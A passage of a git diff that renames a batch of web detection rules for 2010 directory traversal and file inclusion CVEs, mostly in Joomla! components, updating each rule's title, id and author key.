web_cve_CVE-2010-1875_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1953_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1954_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1955_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1979_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1983_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-2033_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-2036_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-2259_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-2307_exploitation_attempt.yaml} | 7 +++---- ...aml => web_cve_CVE-2010-2682_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-2861_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-3426_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-4231_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-4617_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-5278_exploitation_attempt.yaml} | 6 +++--- 32 files changed, 96 insertions(+), 98 deletions(-) rename rules/web/{web_cve_CVE-2010-0943.yaml => web_cve_CVE-2010-0943_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-0944.yaml => web_cve_CVE-2010-0944_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-1306.yaml => web_cve_CVE-2010-1306_exploitation_attempt.yaml} (80%) rename rules/web/{web_cve_CVE-2010-1314.yaml => web_cve_CVE-2010-1314_exploitation_attempt.yaml} (80%) rename rules/web/{web_cve_CVE-2010-1345.yaml => web_cve_CVE-2010-1345_exploitation_attempt.yaml} (79%) rename rules/web/{web_cve_CVE-2010-1353.yaml => web_cve_CVE-2010-1353_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-1474.yaml => web_cve_CVE-2010-1474_exploitation_attempt.yaml} (83%) rename rules/web/{web_cve_CVE-2010-1475.yaml => web_cve_CVE-2010-1475_exploitation_attempt.yaml} (79%) rename rules/web/{web_cve_CVE-2010-1495.yaml => web_cve_CVE-2010-1495_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-1532.yaml => web_cve_CVE-2010-1532_exploitation_attempt.yaml} (81%) rename rules/web/{web_cve_CVE-2010-1533.yaml => web_cve_CVE-2010-1533_exploitation_attempt.yaml} (79%) rename rules/web/{web_cve_CVE-2010-1535.yaml => web_cve_CVE-2010-1535_exploitation_attempt.yaml} (81%) rename rules/web/{web_cve_CVE-2010-1602.yaml => web_cve_CVE-2010-1602_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-1657.yaml => web_cve_CVE-2010-1657_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-1718.yaml => web_cve_CVE-2010-1718_exploitation_attempt.yaml} (80%) rename rules/web/{web_cve_CVE-2010-1722.yaml => web_cve_CVE-2010-1722_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-1875.yaml => web_cve_CVE-2010-1875_exploitation_attempt.yaml} (84%) rename rules/web/{web_cve_CVE-2010-1953.yaml => web_cve_CVE-2010-1953_exploitation_attempt.yaml} (81%) rename rules/web/{web_cve_CVE-2010-1954.yaml => web_cve_CVE-2010-1954_exploitation_attempt.yaml} (79%) rename rules/web/{web_cve_CVE-2010-1955.yaml => web_cve_CVE-2010-1955_exploitation_attempt.yaml} (81%) rename rules/web/{web_cve_CVE-2010-1979.yaml => web_cve_CVE-2010-1979_exploitation_attempt.yaml} (81%) rename rules/web/{web_cve_CVE-2010-1983.yaml => web_cve_CVE-2010-1983_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-2033.yaml => web_cve_CVE-2010-2033_exploitation_attempt.yaml} (84%) rename rules/web/{web_cve_CVE-2010-2036.yaml => web_cve_CVE-2010-2036_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-2259.yaml => web_cve_CVE-2010-2259_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-2307.yaml => web_cve_CVE-2010-2307_exploitation_attempt.yaml} (80%) rename rules/web/{web_cve_CVE-2010-2682.yaml => web_cve_CVE-2010-2682_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-2861.yaml => web_cve_CVE-2010-2861_exploitation_attempt.yaml} (86%) rename rules/web/{web_cve_CVE-2010-3426.yaml => web_cve_CVE-2010-3426_exploitation_attempt.yaml} (80%) rename rules/web/{web_cve_CVE-2010-4231.yaml => web_cve_CVE-2010-4231_exploitation_attempt.yaml} (81%) rename rules/web/{web_cve_CVE-2010-4617.yaml => web_cve_CVE-2010-4617_exploitation_attempt.yaml} (82%) rename rules/web/{web_cve_CVE-2010-5278.yaml => web_cve_CVE-2010-5278_exploitation_attempt.yaml} (85%) diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-0943.yaml rename to rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml index 07b40e00..d6be923a 100644 --- a/rules/web/web_cve_CVE-2010-0943.yaml +++ b/rules/web/web_cve_CVE-2010-0943_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal -id: e5616a8c-a43e-47c2-9fd2-19b429581b90 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-0943 exploitation attempt +id: 63b70c55-0d7a-4e2f-a130-11028352b6ff +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-0944.yaml rename to rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml index eb080266..c38d952b 100644 --- a/rules/web/web_cve_CVE-2010-0944.yaml +++ b/rules/web/web_cve_CVE-2010-0944_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal -id: c3eada81-1f9a-4a55-97b8-d3207d89228e -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-0944 exploitation attempt +id: d30903f7-cb51-445f-81a1-f2948f5fb763 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the JCollection (com_jcollection) diff --git a/rules/web/web_cve_CVE-2010-1306.yaml b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml similarity index 80% rename from rules/web/web_cve_CVE-2010-1306.yaml rename to rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml index 1a6e6268..70431ad7 100644 --- a/rules/web/web_cve_CVE-2010-1306.yaml +++ b/rules/web/web_cve_CVE-2010-1306_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1306:Joomla! Component Picasa 2.0 - Local File Inclusion -id: 560cd98d-aa1d-451b-90a5-08ce5ab72d7b -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1306 exploitation attempt +id: a12a5acd-3ebf-46b8-9ff3-95daeb84b801 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml similarity index 80% rename from rules/web/web_cve_CVE-2010-1314.yaml rename to rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml index e36b0aca..7faa239f 100644 --- a/rules/web/web_cve_CVE-2010-1314.yaml +++ b/rules/web/web_cve_CVE-2010-1314_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion -id: 18019647-a68c-412a-bca9-626618b1a79c -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1314 exploitation attempt +id: 24c87e4f-7206-451a-9164-364ca4f3c388 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml similarity index 79% rename from rules/web/web_cve_CVE-2010-1345.yaml rename to rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml index 6c3fe8c8..25b32926 100644 --- a/rules/web/web_cve_CVE-2010-1345.yaml +++ b/rules/web/web_cve_CVE-2010-1345_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion -id: e70e977a-aaf3-4ec1-a948-493caea7cff3 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1345 exploitation attempt +id: 5f723f65-f584-49f3-87c0-7babbae20d9d +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-1353.yaml rename to rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml index a1c006bd..1ba62bda 100644 --- a/rules/web/web_cve_CVE-2010-1353.yaml +++ b/rules/web/web_cve_CVE-2010-1353_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion -id: 559e6e69-af61-407c-9949-a8602cfb6d95 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1353 exploitation attempt +id: 26d15692-1cfc-4427-8e7d-9a364c2628f3 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml similarity index 83% rename from rules/web/web_cve_CVE-2010-1474.yaml rename to rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml index c023e301..21b6dc41 100644 --- a/rules/web/web_cve_CVE-2010-1474.yaml +++ b/rules/web/web_cve_CVE-2010-1474_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion -id: 06040396-89e0-4919-a186-a3ac48eb2d85 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1474 exploitation attempt +id: 5b50ffc4-dde4-4905-9da9-eb499ee53971 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml similarity index 79% rename from rules/web/web_cve_CVE-2010-1475.yaml rename to rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml index 5d2fb64e..4786c685 100644 --- a/rules/web/web_cve_CVE-2010-1475.yaml +++ b/rules/web/web_cve_CVE-2010-1475_exploitation_attempt.yaml @@ -1,7 +1,6 @@ -title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File - Inclusion -id: 568d0a33-0052-47bc-a04e-8f7e8f05e12d -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1475 exploitation attempt +id: 69295f5a-428a-47d6-bf4d-a93bb23270ca +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-1495.yaml rename to rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml index b3340862..9e3ef52a 100644 --- a/rules/web/web_cve_CVE-2010-1495.yaml +++ b/rules/web/web_cve_CVE-2010-1495_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion -id: cb3ac5e3-de9e-44b7-b0f5-b18a13ba3c69 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1495 exploitation attempt +id: e21410ad-5016-457a-a48f-2da871951471 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Matamko (com_matamko) component diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml similarity index 81% rename from rules/web/web_cve_CVE-2010-1532.yaml rename to rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml index d80c1a20..bb5f49b8 100644 --- a/rules/web/web_cve_CVE-2010-1532.yaml +++ b/rules/web/web_cve_CVE-2010-1532_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion -id: ea2cd3fd-60fc-4945-be6d-e69340a0159d -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1532 exploitation attempt +id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml similarity index 79% rename from rules/web/web_cve_CVE-2010-1533.yaml rename to rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml index 1a181a6a..31ae9336 100644 --- a/rules/web/web_cve_CVE-2010-1533.yaml +++ b/rules/web/web_cve_CVE-2010-1533_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion -id: fc58d241-5812-4a66-acad-2c9370fc2975 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1533 exploitation attempt +id: 2e547af2-0fb1-4d26-829e-fb42d959133c +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the TweetLA (com_tweetla) component diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml similarity index 81% rename from rules/web/web_cve_CVE-2010-1535.yaml rename to rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml index 80029d7f..d2ee67cd 100644 --- a/rules/web/web_cve_CVE-2010-1535.yaml +++ b/rules/web/web_cve_CVE-2010-1535_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion -id: a4abca47-5c67-4b8c-a549-4e04f43ce751 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1535 exploitation attempt +id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-1602.yaml rename to rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml index aba67724..564faaf9 100644 --- a/rules/web/web_cve_CVE-2010-1602.yaml +++ b/rules/web/web_cve_CVE-2010-1602_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion -id: 25e8e854-0a76-4f55-9b7a-9769ea2dbebc -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1602 exploitation attempt +id: d79bf48d-2705-4da1-929b-37e07764998f +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-1657.yaml rename to rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml index 1772f0c8..447bbe51 100644 --- a/rules/web/web_cve_CVE-2010-1657.yaml +++ b/rules/web/web_cve_CVE-2010-1657_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion -id: 4fbedbee-ea11-4a65-9c25-bbb0d74f58fe -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1657 exploitation attempt +id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the SmartSite (com_smartsite) component diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml similarity index 80% rename from rules/web/web_cve_CVE-2010-1718.yaml rename to rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml index 9e4d9a4a..148380f1 100644 --- a/rules/web/web_cve_CVE-2010-1718.yaml +++ b/rules/web/web_cve_CVE-2010-1718_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion -id: 92b06e2a-66ae-47b3-a135-fd2759f05902 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1718 exploitation attempt +id: a538251c-d600-43f3-8051-c3a83a5e8702 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in archeryscores.php in the Archery diff --git a/rules/web/web_cve_CVE-2010-1722.yaml b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-1722.yaml rename to rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml index a7765c23..94179320 100644 --- a/rules/web/web_cve_CVE-2010-1722.yaml +++ b/rules/web/web_cve_CVE-2010-1722_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1722:Joomla! Component Online Market 2.x - Local File Inclusion -id: b0d9873c-08fc-4389-89aa-751d7d8d682e -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1722 exploitation attempt +id: 84715b18-505d-4252-9470-03c98a3006e5 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Online Market (com_market) component diff --git a/rules/web/web_cve_CVE-2010-1875.yaml b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml similarity index 84% rename from rules/web/web_cve_CVE-2010-1875.yaml rename to rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml index e38a061a..9bd796a5 100644 --- a/rules/web/web_cve_CVE-2010-1875.yaml +++ b/rules/web/web_cve_CVE-2010-1875_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1875:Joomla! Component Property - Local File Inclusion -id: 454a58b3-a30a-4577-8175-a93d0febcb34 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1875 exploitation attempt +id: af757e17-ad81-4a28-a551-49c17aa5113a +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Real Estate Property (com_properties) diff --git a/rules/web/web_cve_CVE-2010-1953.yaml b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml similarity index 81% rename from rules/web/web_cve_CVE-2010-1953.yaml rename to rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml index b5cb130b..4f10cf4e 100644 --- a/rules/web/web_cve_CVE-2010-1953.yaml +++ b/rules/web/web_cve_CVE-2010-1953_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1953:Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion -id: e8b2e18e-5a9e-429e-9cd3-a839701736dc -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1953 exploitation attempt +id: 0fc4af77-6974-4e50-bf5e-9f175304eb54 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) diff --git a/rules/web/web_cve_CVE-2010-1954.yaml b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml similarity index 79% rename from rules/web/web_cve_CVE-2010-1954.yaml rename to rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml index 4b1a6939..23ef2619 100644 --- a/rules/web/web_cve_CVE-2010-1954.yaml +++ b/rules/web/web_cve_CVE-2010-1954_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1954:Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion -id: be925ca8-6808-4c32-951d-6069597c2cab -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1954 exploitation attempt +id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) diff --git a/rules/web/web_cve_CVE-2010-1955.yaml b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml similarity index 81% rename from rules/web/web_cve_CVE-2010-1955.yaml rename to rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml index fb9bb13f..10d81d67 100644 --- a/rules/web/web_cve_CVE-2010-1955.yaml +++ b/rules/web/web_cve_CVE-2010-1955_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1955:Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion -id: 9d34dee7-212f-49a0-a1fe-41b37ea241d9 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1955 exploitation attempt +id: 497c0911-226f-48a1-ac9f-518ffb98e65e +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) diff --git a/rules/web/web_cve_CVE-2010-1979.yaml b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml similarity index 81% rename from rules/web/web_cve_CVE-2010-1979.yaml rename to rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml index a88364c8..80eb1897 100644 --- a/rules/web/web_cve_CVE-2010-1979.yaml +++ b/rules/web/web_cve_CVE-2010-1979_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1979:Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion -id: 4ccbb33d-d6d9-4f18-bc7f-502bd3cc9481 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1979 exploitation attempt +id: 5b1c3030-e17b-43b3-b95e-952355a0f43f +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) diff --git a/rules/web/web_cve_CVE-2010-1983.yaml b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-1983.yaml rename to rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml index 7543adad..a29bfea4 100644 --- a/rules/web/web_cve_CVE-2010-1983.yaml +++ b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-1983:Joomla! Component redTWITTER 1.0 - Local File Inclusion -id: fae044ae-fe67-4a83-809f-7a3203ee1a6d -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-1983 exploitation attempt +id: c4f29c4f-0281-4518-a824-88f259d92ef5 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) diff --git a/rules/web/web_cve_CVE-2010-2033.yaml b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml similarity index 84% rename from rules/web/web_cve_CVE-2010-2033.yaml rename to rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml index bcb492f1..20b4dc70 100644 --- a/rules/web/web_cve_CVE-2010-2033.yaml +++ b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-2033:Joomla Percha Categories Tree 0.6 - Local File Inclusion -id: 80fca714-f31f-48e7-82cd-07bb3ed0917d -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-2033 exploitation attempt +id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) diff --git a/rules/web/web_cve_CVE-2010-2036.yaml b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-2036.yaml rename to rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml index 58d3c310..f6c9adca 100644 --- a/rules/web/web_cve_CVE-2010-2036.yaml +++ b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-2036:Joomla! Component Percha Fields Attach 1.0 - Directory Traversal -id: b86f1914-f00b-4ba3-8f0b-3db29399d4d7 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-2036 exploitation attempt +id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) diff --git a/rules/web/web_cve_CVE-2010-2259.yaml b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-2259.yaml rename to rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml index 55e68a9e..70cc525b 100644 --- a/rules/web/web_cve_CVE-2010-2259.yaml +++ b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-2259:Joomla! Component com_bfsurvey - Local File Inclusion -id: a95a2207-33da-40df-a4ab-f8a53d8e99d9 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-2259 exploitation attempt +id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml similarity index 80% rename from rules/web/web_cve_CVE-2010-2307.yaml rename to rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml index 3b4a10be..32008b7c 100644 --- a/rules/web/web_cve_CVE-2010-2307.yaml +++ b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml @@ -1,7 +1,6 @@ -title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - - Directory Traversal -id: 6251acca-594f-48d0-8ec8-6f156c844e6e -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-2307 exploitation attempt +id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Multiple directory traversal vulnerabilities in the web server for Motorola diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml similarity index 82% rename from rules/web/web_cve_CVE-2010-2682.yaml rename to rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml index 170858c7..01e0fedc 100644 --- a/rules/web/web_cve_CVE-2010-2682.yaml +++ b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion -id: 1f409782-791f-4d8b-a63b-d0d713463cdb -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-2682 exploitation attempt +id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml similarity index 86% rename from rules/web/web_cve_CVE-2010-2861.yaml rename to rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml index 40081783..7dc8e6df 100644 --- a/rules/web/web_cve_CVE-2010-2861.yaml +++ b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml @@ -1,6 +1,6 @@ -title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI -id: 7ceb4e78-34fa-48a5-be21-a50307631d19 -author: Subhash Popuri (@pbssubhash) +title: CVE-2010-2861 exploitation attempt +id: 21032758-8761-4a18-8f66-bace612e2481 +Author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Multiple directory traversal vulnerabilities in the administrator console diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml similarity index 80% rename from rules/web/web_cve_CVE-2010-3426.yaml rename to rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml index 42379e8a..ad2dab17 100644 --- a/rules/web/web_cve_CVE-2010-3426.yaml +++ 